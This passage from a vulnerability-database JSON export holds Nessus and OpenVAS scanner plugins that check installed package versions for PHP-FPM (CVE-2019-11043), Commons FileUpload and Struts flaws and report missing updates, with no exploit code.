reference:\"php7-sockets-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-sodium-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-sodium-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-sqlite-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-sqlite-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-sysvmsg-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-sysvmsg-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-sysvsem-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-sysvsem-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-sysvshm-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-sysvshm-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-test-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-tidy-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-tidy-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-tokenizer-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-tokenizer-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-wddx-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-wddx-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-xmlreader-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-xmlreader-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-xmlrpc-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-xmlrpc-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-xmlwriter-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-xmlwriter-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-xsl-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-xsl-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-zip-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-zip-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-zlib-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-zlib-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2-mod_php7 / apache2-mod_php7-debuginfo / php7 / php7-bcmath / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:31:36", "description": "According to the version of the php packages installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - In PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below 7.3.11 in certain configurations of FPM setup it is possible to cause FPM module to write past allocated buffers into the space reserved for FCGI protocol data, thus opening the possibility of remote code execution.(CVE-2019-11043)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-11-27T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP8 : php (EulerOS-SA-2019-2295)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11043"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:php", "p-cpe:/a:huawei:euleros:php-cli", "p-cpe:/a:huawei:euleros:php-common", "p-cpe:/a:huawei:euleros:php-fpm", "p-cpe:/a:huawei:euleros:php-gd", "p-cpe:/a:huawei:euleros:php-ldap", "p-cpe:/a:huawei:euleros:php-odbc", "p-cpe:/a:huawei:euleros:php-pdo", "p-cpe:/a:huawei:euleros:php-process", "p-cpe:/a:huawei:euleros:php-recode", "p-cpe:/a:huawei:euleros:php-soap", "p-cpe:/a:huawei:euleros:php-xml", "p-cpe:/a:huawei:euleros:php-xmlrpc", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2019-2295.NASL", "href": "https://www.tenable.com/plugins/nessus/131361", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(131361);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2019-11043\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0695\");\n\n script_name(english:\"EulerOS 2.0 SP8 : php (EulerOS-SA-2019-2295)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the php packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - In PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24\n and 7.3.x below 7.3.11 in certain configurations of FPM\n setup it is possible to cause FPM module to write past\n allocated buffers into the space reserved for FCGI\n protocol data, thus opening the possibility of remote\n code execution.(CVE-2019-11043)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-2295\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fe0fa928\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected php package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-11043\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP-FPM Underflow RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(8)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP8\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP8\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"php-7.2.10-1.h7.eulerosv2r8\",\n \"php-cli-7.2.10-1.h7.eulerosv2r8\",\n \"php-common-7.2.10-1.h7.eulerosv2r8\",\n \"php-fpm-7.2.10-1.h7.eulerosv2r8\",\n \"php-gd-7.2.10-1.h7.eulerosv2r8\",\n \"php-ldap-7.2.10-1.h7.eulerosv2r8\",\n \"php-odbc-7.2.10-1.h7.eulerosv2r8\",\n \"php-pdo-7.2.10-1.h7.eulerosv2r8\",\n \"php-process-7.2.10-1.h7.eulerosv2r8\",\n \"php-recode-7.2.10-1.h7.eulerosv2r8\",\n \"php-soap-7.2.10-1.h7.eulerosv2r8\",\n \"php-xml-7.2.10-1.h7.eulerosv2r8\",\n \"php-xmlrpc-7.2.10-1.h7.eulerosv2r8\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"8\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-25T14:31:12", "description": "**PHP version 7.2.24** (24 Oct 2019)\n\n**Core:**\n\n - Fixed bug php#78535 (auto_detect_line_endings value not parsed as bool). (bugreportuser)\n\n - Fixed bug php#78620 (Out of memory error). (cmb, Nikita)\n\n**Exif:**\n\n - Fixed bug php#78442 ('Illegal component' on exif_read_data since PHP7) (Kalle)\n\n**FPM:**\n\n - Fixed bug php#78599 (env_path_info underflow in fpm_main.c can lead to RCE). (**CVE-2019-11043**) (Jakub Zelenka)\n\n**MBString:**\n\n - Fixed bug php#78579 (mb_decode_numericentity: args number inconsistency). (cmb)\n\n - Fixed bug php#78609 (mb_check_encoding() no longer supports stringable objects). (cmb)\n\n**MySQLi:**\n\n - Fixed bug php#76809 (SSL settings aren't respected when persistent connections are used). (fabiomsouto)\n\n**PDO_MySQL:**\n\n - Fixed bug php#78623 (Regression caused by 'SP call yields additional empty result set'). (cmb)\n\n**Session:**\n\n - Fixed bug php#78624 (session_gc return value for user defined session handlers). (bshaffer)\n\n**Standard:**\n\n - Fixed bug php#76342 (file_get_contents waits twice specified timeout). (Thomas Calvet)\n\n - Fixed bug php#78612 (strtr leaks memory when integer keys are used and the subject string shorter). (Nikita)\n\n - Fixed bug php#76859 (stream_get_line skips data if used with data-generating filter). (kkopachev)\n\n**Zip:**\n\n - Fixed bug php#78641 (addGlob can modify given remove_path value). (cmb)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-11-04T00:00:00", "type": "nessus", "title": "Fedora 29 : php (2019-187ae3128d)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11043"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:php", "cpe:/o:fedoraproject:fedora:29"], "id": "FEDORA_2019-187AE3128D.NASL", "href": "https://www.tenable.com/plugins/nessus/130476", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2019-187ae3128d.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(130476);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-11043\");\n script_xref(name:\"FEDORA\", value:\"2019-187ae3128d\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0695\");\n\n script_name(english:\"Fedora 29 : php (2019-187ae3128d)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"**PHP version 7.2.24** (24 Oct 2019)\n\n**Core:**\n\n - Fixed bug php#78535 (auto_detect_line_endings value not\n parsed as bool). (bugreportuser)\n\n - Fixed bug php#78620 (Out of memory error). (cmb, Nikita)\n\n**Exif:**\n\n - Fixed bug php#78442 ('Illegal component' on\n exif_read_data since PHP7) (Kalle)\n\n**FPM:**\n\n - Fixed bug php#78599 (env_path_info underflow in\n fpm_main.c can lead to RCE). (**CVE-2019-11043**) (Jakub\n Zelenka)\n\n**MBString:**\n\n - Fixed bug php#78579 (mb_decode_numericentity: args\n number inconsistency). (cmb)\n\n - Fixed bug php#78609 (mb_check_encoding() no longer\n supports stringable objects). (cmb)\n\n**MySQLi:**\n\n - Fixed bug php#76809 (SSL settings aren't respected when\n persistent connections are used). (fabiomsouto)\n\n**PDO_MySQL:**\n\n - Fixed bug php#78623 (Regression caused by 'SP call\n yields additional empty result set'). (cmb)\n\n**Session:**\n\n - Fixed bug php#78624 (session_gc return value for user\n defined session handlers). (bshaffer)\n\n**Standard:**\n\n - Fixed bug php#76342 (file_get_contents waits twice\n specified timeout). (Thomas Calvet)\n\n - Fixed bug php#78612 (strtr leaks memory when integer\n keys are used and the subject string shorter). (Nikita)\n\n - Fixed bug php#76859 (stream_get_line skips data if used\n with data-generating filter). (kkopachev)\n\n**Zip:**\n\n - Fixed bug php#78641 (addGlob can modify given\n remove_path value). (cmb)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2019-187ae3128d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected php package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP-FPM Underflow RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^29([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 29\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC29\", reference:\"php-7.2.24-1.fc29\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "openvas": [{"lastseen": "2020-01-31T16:51:03", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-05-16T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for jakarta-commons-fileupload (openSUSE-SU-2019:1399-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1000031"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310852501", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852501", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852501\");\n script_version(\"2020-01-31T08:04:39+0000\");\n script_cve_id(\"CVE-2016-1000031\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:04:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-05-16 02:01:34 +0000 (Thu, 16 May 2019)\");\n script_name(\"openSUSE: Security Advisory for jakarta-commons-fileupload (openSUSE-SU-2019:1399-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.0\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2019:1399-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2019-05/msg00036.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'jakarta-commons-fileupload'\n package(s) announced via the openSUSE-SU-2019:1399-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for jakarta-commons-fileupload fixes the following issue:\n\n Security issue fixed:\n\n - CVE-2016-1000031: Fixed remote execution (bsc#1128963, bsc#1128829).\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2019-1399=1\");\n\n script_tag(name:\"affected\", value:\"'jakarta-commons-fileupload' package(s) on openSUSE Leap 15.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"jakarta-commons-fileupload\", rpm:\"jakarta-commons-fileupload~1.1.1~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"jakarta-commons-fileupload-javadoc\", rpm:\"jakarta-commons-fileupload-javadoc~1.1.1~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:27", "description": "Apache Commons FileUpload before 1.3.3 DiskFileItem File Manipulation Remote\nCode Execution. Apache Struts version 2.3.36 and prior contain the affected Commons FileUpload library.", "cvss3": {}, "published": "2018-11-08T00:00:00", "type": "openvas", "title": "Apache Struts <= 2.3.36 commons-fileupload RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1000031"], "modified": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310141668", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310141668", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Struts <= 2.3.36 commons-fileupload RCE Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.141668\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-11-08 13:09:14 +0700 (Thu, 08 Nov 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2016-1000031\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Apache Struts <= 2.3.36 commons-fileupload RCE Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"This script is Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_struts_detect.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\");\n\n script_tag(name:\"summary\", value:\"Apache Commons FileUpload before 1.3.3 DiskFileItem File Manipulation Remote\nCode Execution. Apache Struts version 2.3.36 and prior contain the affected Commons FileUpload library.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts 2.3.36 and prior.\");\n\n script_tag(name:\"solution\", value:\"Update to Struts version 2.5.12 or later or update the Commons FileUpload\nlibrary manually to version 1.3.3.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_xref(name:\"URL\", value:\"https://mail-archives.us.apache.org/mod_mbox/www-announce/201811.mbox/%3CCAMopvkMo8WiP%3DfqVQuZ1Fyx%3D6CGz0Epzfe0gG5XAqP1wdJCoBQ%40mail.gmail.com%3E\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif(!infos = get_app_version_and_location(cpe: CPE, port: port, exit_no_version: TRUE)) exit(0);\nversion = infos['version'];\npath = infos['location'];\n\nif (version_is_less_equal(version: version, test_version: \"2.3.36\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"2.5.12\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-09T17:43:22", "description": "Apache Struts2 released a remote code execution vulnerability in S2-045 on the official website.", "cvss3": {}, "published": "2020-06-05T00:00:00", "type": "openvas", "title": "Huawei Data Communication: Apache Struts2 Remote Code Execution Vulnerability in Huawei Products (huawei-sa-20170316-01-struts2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2020-06-06T00:00:00", "id": "OPENVAS:1361412562310108771", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108771", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later 